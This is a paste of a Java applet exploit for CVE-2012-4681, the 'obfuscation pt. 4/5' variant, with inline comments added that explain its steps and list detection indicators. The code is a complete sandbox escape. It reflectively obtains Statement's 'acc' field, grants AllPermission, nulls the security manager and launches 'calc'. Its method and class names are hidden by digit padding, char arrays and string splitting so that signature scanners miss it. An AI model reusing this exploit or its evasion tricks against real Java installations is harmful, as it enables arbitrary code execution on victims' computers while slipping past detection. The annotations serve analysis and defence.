
Java 7 Exploit CVE-2012-4681 obfuscation pt. 4/5

SecurityObscurity Nov 15th, 2012 734 Never
  1. /*
  2.  *  Java 7 Exploit CVE-2012-4681 obfuscation pt. 4/5
  3.  *  
  4.  *  Affected product versions:
  5.  *  - JDK and JRE 7 Update 6 and before
  6.  *
  7.  * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
  8.  */
  9. import java.applet.Applet;
  10. import java.awt.Graphics;
  11. import java.beans.Expression;
  12. import java.beans.Statement;
  13. import java.lang.reflect.Field;
  14. import java.net.URL;
  15. import java.security.*;
  16. import java.security.cert.Certificate;
  17. import java.lang.reflect.Constructor;
  18. import java.lang.reflect.Method;
  19. import java.net.URI;
  20.  
  21. public class Java extends Applet
  22. {
          /*
           * Analysis notes (defensive reading of this sample).
           *
           * This applet is a proof of concept for CVE-2012-4681 in which every
           * security-relevant name is assembled at runtime instead of appearing
           * as one string literal. Three techniques are visible in the fields
           * below: digit padding removed with replaceAll("\\d",""), char arrays
           * (including numeric character codes), and concatenation of short
           * fragments. A signature that searches the class file for the literal
           * names "setSecurityManager", "sun.awt.SunToolkit", "getField" or
           * "forName" will therefore not match this variant.
           *
           * Indicators that survive the obfuscation in this listing: an Applet
           * subclass that uses java.beans.Expression / java.beans.Statement
           * together with AllPermission, ProtectionDomain and
           * AccessControlContext, reflective Field.set on a value obtained
           * through Expression, and an empty catch (Throwable) around the whole
           * sequence. The affected versions are the ones listed in the header
           * comment of this paste.
           */
          // Digit-padded; enableSecurity() strips the digits, leaving "setSecurityManager".
  23.     String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
          // Char array spelling "sun.awt.SunToolkit"; turned into a String with new String(sun).
  24.     char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
  25.     char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47}; // character codes for "file:///"
  26.     String   ad = "or",me = "me", aw = "f", kl = "Na"; // joined in GimmeClass() as aw+ad+kl+me = "forName"
  27.     String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; // digits stripped at use, leaving "getField"
  28.  
          /*
           * Despite its name, this method ends by calling
           * System.setSecurityManager with a single null argument, i.e. it
           * removes the security manager that sandboxes the applet.
           *
           * Sequence visible in the body:
           *  1. Obtain a java.lang.reflect.Field for the field named "acc" of
           *     java.beans.Statement by invoking getField on sun.awt.SunToolkit
           *     through java.beans.Expression.
           *     NOTE(review): public write-ups of CVE-2012-4681 say that this
           *     call returns the field with access checks disabled; that is not
           *     visible in this listing.
           *  2. Build an AccessControlContext whose only ProtectionDomain
           *     carries AllPermission.
           *  3. Construct a Statement targeting java.lang.System with the
           *     method name "setSecurityManager" and a one-element argument
           *     array whose element is null.
           *  4. Overwrite that Statement's "acc" field with the context from
           *     step 2, then run the Statement.
           *
           * Declared to throw Throwable; the only caller in this listing,
           * init(), discards whatever is thrown.
           */
  29.     public void enableSecurity() throws Throwable
  30.     {
  31.         Object ao[] = new Object[2];
  32.         ao[0] = GimmeClass("java.beans.Statement"); // resolves Statement.class by name
  33.         ao[1] = "a"+"c"+"c"; // "acc", the name of the field requested in the next statement
  34.        
              // Equivalent to calling getField(Statement.class, "acc") on sun.awt.SunToolkit.
  35.         Expression e = new Expression(GimmeClass(new String(sun)), field.replaceAll("\\d",""), ao);
  36.         e.execute();
  37.         Field field = (Field)e.getValue(); // local 'field' shadows the String member of the same name
  38.  
              // Permission set containing AllPermission.
  39.         Permissions pe = new Permissions();
  40.         pe.add(new AllPermission());
  41.  
              // Protection domain for the code source "file:///" with an empty certificate array.
  42.         URI uri = new URI(new String(file));
  43.         CodeSource cs = new CodeSource( uri.toURL(), new Certificate[0]);
  44.         ProtectionDomain pd = new ProtectionDomain(cs,pe);
  45.        
  46.         AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });
  47.        
              // Statement is looked up and constructed reflectively, with its class name split into fragments.
  48.         Class statClass = GimmeClass("ja"+"va."+"be"+"ans"+".S"+"tat"+"em"+"ent");
  49.         Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});
              // Target java.lang.System, method "setSecurityManager", argument array holding one null.
  50.         Object stat = con.newInstance(GimmeClass("java.lan"+"g.S"+"ys"+"tem"),secMan.replaceAll("\\d",""), new Object[1]);
              // Replace the Statement's stored access-control context with the all-permission one.
  51.         field.set(stat, ac);
              // "execute" is also looked up by a split name and invoked through reflection.
  52.         Method m = stat.getClass().getMethod("ex"+"ecu"+"te");
  53.         m.invoke(stat);
  54.     }
  55.  
          /*
           * Applet entry point: runs enableSecurity() and then starts the
           * external program "calc" as the demonstration payload.
           *
           * The empty catch discards every Throwable, so a failure at any step
           * leaves no exception output. For detection, the observable effect of
           * a successful run is a child process started by the Java runtime that
           * hosts the applet.
           */
  56.     public void init()
  57.     {
  58.         try
  59.         {
  60.             enableSecurity();
  61.             Runtime.getRuntime().exec("calc");
  62.         }
  63.         catch(Throwable t){} // deliberately silent: nothing is logged or rethrown
  64.     }
  65.    
          /*
           * Resolves a class by name by invoking forName on Class.class through
           * java.beans.Expression instead of calling Class.forName directly.
           * The method name is built from the aw, ad, kl and me fields.
           *
           * ps is the fully qualified class name; the return value is whatever
           * the Expression produced, cast to Class.
           * NOTE(review): presumably the indirection is what lets the applet
           * reach sun.awt.SunToolkit; confirm against the CVE write-up linked
           * in the header.
           */
  66.     private Class GimmeClass(String ps) throws Throwable
  67.     {
  68.         Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
  69.         le.execute();
  70.         return (Class)le.getValue();
  71.     }    
  72. }